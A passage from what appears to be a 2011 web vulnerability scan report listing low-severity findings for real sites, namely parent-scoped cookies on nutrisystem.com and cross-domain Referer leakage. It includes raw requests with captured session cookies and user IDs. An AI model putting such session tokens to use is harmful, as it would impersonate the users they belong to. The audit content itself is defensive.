X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Wed, 12 Jan 2011 02:25:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Salary
...[SNIP]...

9.7. http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/common/assignCampaign.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/common/assignCampaign.jsp?URI=/webmedia1810&queryString=_requestid%3D566196&errorRedirect=true&siteId=Nutrisystem&_requestid=566196 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 02:48:27 GMT; Path=/
Location: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=566196
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0
Date: Wed, 12 Jan 2011 02:48:27 GMT


9.8. http://www.nutrisystem.com/jsps_hmr/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/home/ HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:42 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:42 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:42 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

9.9. http://www.nutrisystem.com/jsps_hmr/home/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/index.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/home/index.jsp?_requestid=566196 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; NSOfmCookieMarker=include

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: NSOfmCookieMarker=exclude; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 02:48:28 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 02:48:28 GMT
Content-Length: 67789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

9.10. http://www.nutrisystem.com/jsps_hmr/shop/order_now.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/shop/order_now.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/shop/order_now.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:51 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
       <meta http-equiv="P3P"
...[SNIP]...

9.11. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/success_stories/index.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/success_stories/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:50 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:50 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:50 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="P3P" content='p
...[SNIP]...

9.12. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tracking/click.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/tracking/click.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:40 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=618611
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:53:40 GMT
Connection: close


9.13. http://www.nutrisystem.com/jsps_hmr/user/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/user/login.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps_hmr/user/login.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:51 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

10. Cross-domain Referer leakage  previous  next
There are 21 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://ad.doubleclick.net/adj/N5767.msn.comOX2567/B4643263.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5767.msn.comOX2567/B4643263.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N5767.msn.comOX2567/B4643263.3;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0002Q/113000000000023888.1?!&&PID=7362116&UIT=G&TargetID=8329309&AN=1644252045&PG=NBC9CD&ASID=c234e7609114463c882c8411118a009a&destination=;ord=1644252045? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 02:49:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 509

document.write('<a target="="_blank"" href="http://ad.doubleclick.net/click;h=v8/3a8d/4/0/%2a/b;227537752;0-0;0;50195631;4307-300/250;38347468/38365225/1;;~sscs=%3fhttp://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3298535473152&CreativeID=38347468&PlacementID=50195631&EventType=Click&rand=7398257&RedirectURL=http://www.metamucil.com/videos.php"><img src="http://s0.2mdn.net/viewad/2278298/BAN_Metamucil_MTA2647_Amazon_300x250_FY1011_Q1_Static_R.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

10.2. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:35:34 GMT; path=/; domain=digg.com
Set-Cookie: d=db13767ba9540a301565fea6e002af8216560e2a540a166f4d8c77e01281dd66; expires=Mon, 11-Jan-2021 13:43:14 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24364 10.2.129.226
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">


<link rel="stylesheet" type="text/css" href="http://cdn3.diggstatic.com/css/library/global.bd6f8f96.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn4.diggstatic.com/js/lib.aa1e98d4.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

10.3. http://jqueryui.com/themeroller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119992

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHead
...[SNIP]...
rShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">&copy; 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

10.4. http://research.scottrade.com/services/modules/smarttext/smarttext.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.scottrade.com
Path:   /services/modules/smarttext/smarttext.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /services/modules/smarttext/smarttext.asp?click=//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.80.js.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1d&symbol=&issue_type=&scode=&name=&wsodissue=&recent= HTTP/1.1
Host: research.scottrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 12 Jan 2011 03:48:58 GMT
Content-Length: 8740
Content-Type: text/html
Expires: Wed, 12 Jan 2011 03:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Scottrade - $7 Online Trades</title>
<meta content="text/html; charset=ISO-8859-1" http-equiv="Content-Type"/>
<script language="JavaScript" type="text/javascript" src="//admedia.wsod.com/resources/scripts/jquery-1.3.2.js"></script>
...[SNIP]...

10.5. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

